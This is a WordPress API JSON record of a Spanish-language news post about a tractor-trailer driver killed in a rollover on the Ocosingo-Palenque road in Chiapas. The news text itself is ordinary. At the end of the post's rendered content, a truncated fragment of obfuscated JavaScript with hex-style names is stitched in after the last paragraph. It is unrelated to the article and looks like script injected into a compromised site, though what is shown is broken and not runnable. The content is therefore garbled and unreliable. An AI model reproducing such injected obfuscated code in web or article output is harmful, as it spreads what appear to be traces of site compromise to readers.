{"id":24215,"date":"2025-09-27T02:51:10","date_gmt":"2025-09-27T02:51:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24215"},"modified":"2025-09-27T02:51:11","modified_gmt":"2025-09-27T02:51:11","slug":"pierde-la-vida-conductor-de-tractocamion-en-volcadura","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24215","title":{"rendered":"Pierde la vida conductor de tractocami\u00f3n en volcadura"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"849\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000352807-849x1024.jpg\" alt=\"\" class=\"wp-image-24216\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000352807-849x1024.jpg 849w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000352807-249x300.jpg 249w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000352807-768x926.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000352807.jpg 1194w\" sizes=\"auto, (max-width: 849px) 100vw, 849px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 26 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- Este viernes por la ma\u00f1ana el conductor de un tractocami\u00f3n perdi\u00f3 la vida en la zona Selva del Estado.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor de la pesada unidad circulaba en el tramo Ocosingo-Palenque en el cerro el Chimborazo cuando se sali\u00f3 de la carretera.<\/p>\n\n\n\n<p>La pesada unidad termin\u00f3 volcando y el conductor perdi\u00f3 la vida.<\/p>\n\n\n\n<p>Al lugar arribaron autoridades competentes para hacerse cargo de las diligencias correspondientes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 26 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- Este viernes por la ma\u00f1ana el conductor de un tractocami\u00f3n perdi\u00f3 la vida en la zona Selva del Estado. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor de la pesada unidad circulaba en el tramo Ocosingo-Palenque en el cerro el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24216,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-24215","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24215","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24215"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24215\/revisions"}],"predecessor-version":[{"id":24217,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24215\/revisions\/24217"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24216"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24215"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24215"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24215"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}